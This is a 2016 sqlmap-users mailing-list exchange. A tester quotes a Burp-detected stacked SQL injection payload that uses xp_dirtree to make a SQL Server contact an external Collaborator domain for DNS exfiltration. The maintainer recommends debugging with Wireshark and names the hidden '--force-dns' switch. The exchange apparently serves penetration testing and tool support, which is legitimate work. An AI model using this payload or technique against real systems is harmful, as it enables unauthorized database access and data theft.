Re: [sqlmap-users] Sqlmap/DNS exfil
From: Miroslav S. <mir...@gm...> - 2016-12-19 22:11:00
I would suggest that you run Wireshark or similar when running with --dns-domain to properly debug what is going on. There could be really a lot of problems before you fine-tune it (e.g. other service running on :53).

About "forcing" sqlmap to use dns-exfil: it will always at least try to test it at the start of a run (if another injection technique is available). Also, it will prefer other "faster" techniques (ERROR and UNION) over dns-exfil. However, there is a hidden switch "--force-dns" which will force the usage of dns-exfil even if ERROR/UNION are available.

As said, the best advice I can give you is to run Wireshark during the run and really see what is going on.

Bye

On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@ho...> wrote:

> I have a situation where Burp has detected the following DNS exfiltration
> injection for a query parameter in a web app:
>
> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q
> %20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9ux
> lo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.
> dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1
>
> To make that a little easier to read, the injected value is:
>
> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9ux
> lo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree @q;--
>
> I've modified the domain and verified that I receive the DNS requests on
> my local DNS server (the domain which I provide to sqlmap using the
> --dns-domain=xxx option) when the injection is manually sent to the page.
> The problem is, when I pass the request to sqlmap it's not detecting that
> there's an injection at all. I've provided the OS/DBMS and --level 5, but
> still no dice. I'm using sqlmap v1.0.12#stable.
>
> Since I've gotten many other injections to work in the past, I believe
> that I'm using sqlmap properly (formatting my request in a file
> appropriately, specifying the correct parameter to test, etc.) However, it
> surprised me that what appeared to be a fairly straight-forward stacked SQL
> injection would slip by all of sqlmap's tests. Is there a way to force
> sqlmap to try DNS exfiltration injections despite no other injection
> technique succeeding?
>
> Thanks
>
> V

--
Miroslav Stampar
http://about.me/stamparm